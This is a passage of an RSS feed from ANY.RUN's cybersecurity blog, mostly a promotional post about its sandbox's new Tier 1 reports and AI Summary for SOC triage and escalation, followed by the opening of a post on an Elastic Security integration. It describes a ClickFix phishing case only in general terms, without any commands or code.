<span class="highlight">Faster response across the SOC.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=soc_ready_reporting&#038;utm_term=130526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Optimize Your SOC Workflow
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Use Case&nbsp;#1:&nbsp;Fast Threat Understanding&nbsp;for Tier 1&nbsp;During&nbsp;Triage&nbsp;</h3>



<p>Via&nbsp;Tier 1 reports&nbsp;featuring AI Summaries, ANY.RUN’s Interactive Sandbox&nbsp;provides&nbsp;immediate&nbsp;answers to the most&nbsp;critical&nbsp;questions&nbsp;that occur&nbsp;during&nbsp;<a href="https://any.run/cybersecurity-blog/alert-enrichment-soc-performance/" target="_blank" rel="noreferrer noopener">alert&nbsp;triage</a>:&nbsp;</p>



<ul class="wp-block-list">
<li>Is the sample malicious?&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>What behavior&nbsp;indicates&nbsp;that?&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>What type of threat&nbsp;is involved?&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>What&nbsp;MITRE&nbsp;ATT&amp;CK&nbsp;TTPs&nbsp;and&nbsp;IOCs are&nbsp;present?&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Does the incident&nbsp;require escalation?&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="183" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-1024x183.png" alt="" class="wp-image-20834" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-1024x183.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-300x54.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-768x137.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-1536x275.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-370x66.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-270x48.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13-740x132.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.54.13.png 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat verdict&nbsp;and&nbsp;tags at the top of Tier 1 reports already provide key info on the analyzed object</em>&nbsp;</figcaption></figure></div>


<p>Instead of manually reviewing raw technical data to answer these questions with confidence,&nbsp;the&nbsp;sandbox provides this&nbsp;context automatically in the form of a ready-to-use report that covers all findings into a clear operational document&nbsp;for&nbsp;fast&nbsp;and&nbsp;substantiated decision-making.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-317"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="5"
           data-wpID="317"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-BEE9FD wpdt-tc-000000 wpdt-bold wpdt-merged-cell "
                     colspan="2"  rowspan="1"                     data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:100%;                    padding:10px;
                    "
                    >
                                        ANY.RUN’s Interactive Sandbox & Tier 1 Reports                      </th>
                                                    </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Operational Impact                     </td>
                                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Business Impact                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Faster alert validation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Consistent triage quality                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Reduced manual enrichment                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Better <a class="wpdt-link-content" href="https://any.run/cybersecurity-blog/soc-staff-shortage-burnout/"  rel="" target="_blank" data-cell-id="31" data-link-url="https://any.run/cybersecurity-blog/soc-staff-shortage-burnout/" data-link-text="analyst productivity" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">analyst productivity</a>                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Fewer unnecessary escalations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Reduced operational overhead                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-317'>
table#wpdtSimpleTable-317{ table-layout: fixed !important; }
table#wpdtSimpleTable-317 td, table.wpdtSimpleTable317 th { white-space: normal !important; }
.wpdt-bc-BEE9FD { background-color: #BEE9FD !important;}
.wpdt-tc-000000 { color: #000000 !important;}
</style>




<h3 class="wp-block-heading">Use Case&nbsp;#2:&nbsp;Easy Access to&nbsp;Context&nbsp;for&nbsp;Tier 2, Tier 3, IR teams&nbsp;&nbsp;</h3>



<p>In case of an escalation, Tier 2 analysts&nbsp;and&nbsp;incident&nbsp;responders&nbsp;frequently&nbsp;need to reconstruct investigation context manually before&nbsp;proceeding&nbsp;with containment.&nbsp;</p>



<p>Raw sandbox outputs take time to process&nbsp;and&nbsp;interpret,&nbsp;stretching&nbsp;investigation&nbsp;time&nbsp;and&nbsp;creating friction, as higher tiers&nbsp;essentially have&nbsp;to go back to&nbsp;triage stage for&nbsp;verification.&nbsp;</p>



<p>With Tier 1 reports, analysts get&nbsp;a structured&nbsp;information to pass on at the early stage, making ANY.RUN’s Interactive Sandbox more smoothly embedded into the entire investigation cycle,&nbsp;<a href="https://any.run/cybersecurity-blog/fortune-500-enterprise-success-story/" target="_blank" rel="noreferrer noopener">from&nbsp;triage to response</a>.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="734" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-1024x734.png" alt="" class="wp-image-20831" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-1024x734.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-300x215.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-768x550.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-1536x1100.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-370x265.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-270x193.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53-740x530.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.53.png 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Clear breakdown of&nbsp;detected&nbsp;MITRE ATT&amp;CK TTPs inside Tier 1 report</em>&nbsp;</figcaption></figure></div>


<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-316"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="5"
           data-wpID="316"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-BEE9FD wpdt-tc-000000 wpdt-bold wpdt-merged-cell "
                     colspan="2"  rowspan="1"                     data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:100%;                    padding:10px;
                    "
                    >
                                        ANY.RUN’s Interactive Sandbox & Tier 1 Reports                      </th>
                                                    </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Operational Impact                     </td>
                                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Business Impact                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Reduced friction during handoffs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Better collaboration between teams                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        No context lost in the process                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Full visibility for decision-makers                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Accelerated investigation pipeline                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Optimized operations across tiers                      </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-316'>
table#wpdtSimpleTable-316{ table-layout: fixed !important; }
table#wpdtSimpleTable-316 td, table.wpdtSimpleTable316 th { white-space: normal !important; }
.wpdt-bc-BEE9FD { background-color: #BEE9FD !important;}
.wpdt-tc-000000 { color: #000000 !important;}
</style>




<h3 class="wp-block-heading">Use Case&nbsp;#3:&nbsp;Immediate Clarity for&nbsp;Decision-Makers&nbsp;</h3>



<p>SOC managers, Heads of SOC,&nbsp;and&nbsp;CISOs&nbsp;don’t&nbsp;have time to review every technical artifact associated with an incident.&nbsp;Traditional&nbsp;reports may&nbsp;contain&nbsp;too many&nbsp;low-level&nbsp;details,&nbsp;whereas&nbsp;security leaders must assess&nbsp;the&nbsp;general&nbsp;business impact&nbsp;and&nbsp;urgency of a&nbsp;threat.&nbsp;</p>



<p>ANY.RUN’s Interactive Sandbox&nbsp;optimizes&nbsp;the&nbsp;hand-off&nbsp;workflow with a&nbsp;concise overview of the analysis in operational language suitable for leadership.&nbsp;</p>



<p>With AI Summary as part of the structure, the report explains what happened, why the object is malicious, which&nbsp;assets&nbsp;or systems&nbsp;may be&nbsp;at risk.&nbsp;&nbsp;</p>



<p>As a result, analysis outputs become standardized&nbsp;and&nbsp;practical,&nbsp;making&nbsp;them&nbsp;immediately&nbsp;usable for decision-making&nbsp;and&nbsp;internal communication.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-315"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="5"
           data-wpID="315"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-BEE9FD wpdt-tc-000000 wpdt-bold wpdt-merged-cell "
                     colspan="2"  rowspan="1"                     data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:100%;                    padding:10px;
                    "
                    >
                                        ANY.RUN’s Interactive Sandbox & Tier 1 Reports                      </th>
                                                    </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Operational Impact                     </td>
                                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Business Impact                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Faster incident understanding                       </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Better executive visibility 
                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Easier communication between teams                       </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Faster prioritization through clarity                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Consistent incident documentation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Stronger operational governance                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-315'>
table#wpdtSimpleTable-315{ table-layout: fixed !important; }
table#wpdtSimpleTable-315 td, table.wpdtSimpleTable315 th { white-space: normal !important; }
.wpdt-bc-BEE9FD { background-color: #BEE9FD !important;}
.wpdt-tc-000000 { color: #000000 !important;}
</style>




<h2 class="wp-block-heading">Hands-On Case: Generating a Response-Ready Report on&nbsp;a&nbsp;Phishing&nbsp;Attack&nbsp;</h2>



<p><a href="https://app.any.run/tasks/2763d751-0061-4d05-b599-172d63ff6854?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting &amp;utm_term=130526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis</a>&nbsp;</p>



<p>In this&nbsp;phishing investigation, the&nbsp;Tier 1 report&nbsp;provides a clear, operational overview of the&nbsp;entire attack chain, helping&nbsp;both&nbsp;analysts&nbsp;and&nbsp;leadership&nbsp;quickly understand&nbsp;the&nbsp;threat&nbsp;severity&nbsp;and&nbsp;required&nbsp;response actions.&nbsp;</p>



<p>AI Summary further structures the findings into operationally relevant context suitable for&nbsp;triage, escalation,&nbsp;and&nbsp;internal communication:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="685" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-1024x685.png" alt="" class="wp-image-20832" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-1024x685.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-300x201.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-768x514.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-1536x1027.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-370x247.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-270x181.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31-740x495.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-13.53.31.png 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI Summary providing a clear, structured overview of the threat</em>&nbsp;</figcaption></figure></div>


<p>The&nbsp;AI&nbsp;summary highlights the&nbsp;detection of a&nbsp;<a href="https://any.run/cybersecurity-blog/macos-clickfix-amos-attack/" target="_blank" rel="noreferrer noopener">ClickFix</a>&nbsp;phishing technique, followed by PowerShell execution with Execution Policy bypass attempts used to launch malicious activity on the host. It also outlines payload delivery behavior,&nbsp;subsequent&nbsp;system modifications,&nbsp;and&nbsp;persistence attempts through Windows Registry changes.&nbsp;</p>



<p>Instead of manually reconstructing the attack flow from raw sandbox telemetry, analysts receive a ready-to-use interpretation of the incident&nbsp;that can&nbsp;immediately&nbsp;support escalation&nbsp;and&nbsp;response&nbsp;workflows.&nbsp;</p>



<p>The complete attack chain, behavioral indicators,&nbsp;and&nbsp;resulting conclusions are already structured for operational use&nbsp;and&nbsp;are ready for further processing: escalation, IR hand-off,&nbsp;and&nbsp;containment.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn sandbox analysis into confident SOC decisions<br>

with <span class="highlight">interactive investigations </span>and <span class="highlight">refined reporting</span>

</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=soc_ready_reporting&#038;utm_term=130526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Power Your SOC with ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">From Analysis to Action:&nbsp;Faster&nbsp;Escalations, Response,&nbsp;and&nbsp;Reporting&nbsp;</h2>



<p>The new Tier 1 reports&nbsp;featuring&nbsp;AI Summary deliver direct operational value across the SOC:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster&nbsp;Triage</strong>: Tier 1 analysts can quickly understand&nbsp;the nature of the threat&nbsp;and&nbsp;make confident&nbsp;decisions on whether to close or escalate&nbsp;alerts.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Streamlined Escalation Process</strong>: Tier 2&nbsp;and&nbsp;IR teams receive well-structured context instead of raw data, reducing handoff time&nbsp;and&nbsp;miscommunication.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Accelerated Incident&nbsp;Response</strong>: Teams gain rapid visibility into attack behavior,&nbsp;helping reduce Mean Time to Respond (MTTR).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Improved Internal Reporting</strong>: SOC managers&nbsp;and&nbsp;CISOs get consistent, professional summaries that are easy to read&nbsp;and&nbsp;share with stakeholders.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>More Consistent&nbsp;Performance</strong>: Standardized reports reduce quality variation between analysts&nbsp;and&nbsp;lower the risk of human error.&nbsp;</li>
</ul>



<p>Unlimited access is available for&nbsp;Enterprise Suite&nbsp;and&nbsp;Hunter plans. Free plan users have a shared limit of 5 generations for both the Tier 1 report&nbsp;and&nbsp;AI Summary.&nbsp;</p>



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p>ANY.RUN’s new Tier 1 reports&nbsp;and&nbsp;AI Summary convert sandbox analysis outputs into structured, operationally ready documents that support every stage of the incident&nbsp;lifecycle, from&nbsp;initial&nbsp;triage to executive visibility.&nbsp;</p>



<p>Embedding Interactive Sandbox directly into a SOC&nbsp;workflow&nbsp;strengthens&nbsp;overall security operations maturity by allowing for&nbsp;faster&nbsp;and&nbsp;more confident&nbsp;decision-making across processes.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;delivers cybersecurity solutions designed to support real-world SOC operations. They&nbsp;help&nbsp;security teams understand&nbsp;threats&nbsp;faster, make informed decisions,&nbsp;and&nbsp;operationalize threat intelligence across&nbsp;detection, investigation,&nbsp;and&nbsp;response&nbsp;workflows.&nbsp;</p>



<p>The&nbsp;company’s solutions include&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;for&nbsp;enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds,</a>&nbsp;providing continuously updated intelligence based on live attack analysis.&nbsp;</p>



<p>Used by over 15,000 organizations&nbsp;and&nbsp;600,000 security professionals&nbsp;worldwide, ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified,</a>&nbsp;ensuring strong security controls&nbsp;and&nbsp;protection of customer data.&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc-ready-reporting&amp;utm_term=130526&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener">Request access to ANY.RUN’s solutions →</a>&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">FAQ&nbsp;</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1778658461932"><strong class="schema-faq-question">What are SOC-ready reports in ANY.RUN? </strong> <p class="schema-faq-answer">SOC-ready reports are sandbox analysis summaries that provide operational context for faster triage, escalation, incident response, and internal reporting. </p> </div> <div class="schema-faq-section" id="faq-question-1778658466921"><strong class="schema-faq-question">Are Tier 1 reports designed only for Tier 1 analysts? </strong> <p class="schema-faq-answer">No. While Tier 1 reports are designed to accelerate initial triage, they also support Tier 2, Tier 3, incident response teams, SOC managers, and CISOs by providing structured operational context, standardized reporting, and fast visibility into threat severity and business impact. </p> </div> <div class="schema-faq-section" id="faq-question-1778658471305"><strong class="schema-faq-question">What is included in ANY.RUN Tier 1 reports? </strong> <p class="schema-faq-answer">Tier 1 reports include a threat verdict, AI Summary, MITRE ATT&amp;CK mapping, behavioral indicators, and IOCs generated directly from Interactive Sandbox analysis. </p> </div> <div class="schema-faq-section" id="faq-question-1778658476040"><strong class="schema-faq-question">How does AI Summary improve incident response? </strong> <p class="schema-faq-answer">AI Summary converts technical sandbox findings into concise operational explanations that help analysts and decision-makers quickly assess threat severity, business impact, and required response actions. </p> </div> <div class="schema-faq-section" id="faq-question-1778658481726"><strong class="schema-faq-question">Can ANY.RUN reports support SOC and MDR workflows? </strong> <p class="schema-faq-answer">Yes. ANY.RUN’s SOC-ready reporting helps standardize triage, escalation, and investigation workflows across internal SOC, MDR, and MSSP teams. </p> </div> </div>



<p></p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/soc-ready-reporting/">New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/soc-ready-reporting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN &amp; Elastic Security: Bring Threat Intelligence into Detection and Investigation Workflows      </title>
		<link>https://any.run/cybersecurity-blog/anyrun-elastic-security/</link>
					<comments>https://any.run/cybersecurity-blog/anyrun-elastic-security/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 12 May 2026 11:15:30 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[update]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20804</guid>

					<description><![CDATA[<p>Security teams&#160;don’t&#160;lack data. They lack&#160;timely, usable intelligence. Analysts spend too much time&#160;validating&#160;indicators, switching between tools, and figuring out what&#160;actually matters. This introduces delays and puts organizations at risk of a missed incident.&#160;&#160; ANY.RUN&#160;solves this by bringing real-time, behavior-validated threat intelligence from ANY.RUN integrated into&#160;Elastic Security,&#160;where&#160;SOC&#160;and MSSP teams detect emerging cyberattacks earlier and respond faster without [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/anyrun-elastic-security/">ANY.RUN &amp; Elastic Security: Bring Threat Intelligence into Detection and Investigation Workflows      </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Security teams&nbsp;don’t&nbsp;lack data. They lack&nbsp;timely, usable intelligence. Analysts spend too much time&nbsp;validating&nbsp;indicators, switching between tools, and figuring out what&nbsp;actually matters. This introduces delays and puts organizations at risk of a missed incident.&nbsp;&nbsp;</p>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;solves this by bringing real-time, behavior-validated threat intelligence from ANY.RUN integrated into&nbsp;<a href="https://www.elastic.co/security/siem" target="_blank" rel="noreferrer noopener">Elastic Security</a>,&nbsp;where&nbsp;SOC&nbsp;and MSSP teams detect emerging cyberattacks earlier and respond faster without changing their workflows.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">ANY.RUN Threat&nbsp;Intelligence&nbsp;Feeds&nbsp;x&nbsp;Elastic Security: About the Integration&nbsp;&nbsp;</h2>



<p><a href="https://www.elastic.co/docs/reference/integrations/ti_anyrun" target="_blank" rel="noreferrer noopener">Integrate ANY.RUN’s TI Feeds in Elastic Security →</a>&nbsp;</p>



<p>Elastic Security unifies SIEM, endpoint security, and cloud security to help teams protect, investigate, and respond to threats.&nbsp;&nbsp;</p>



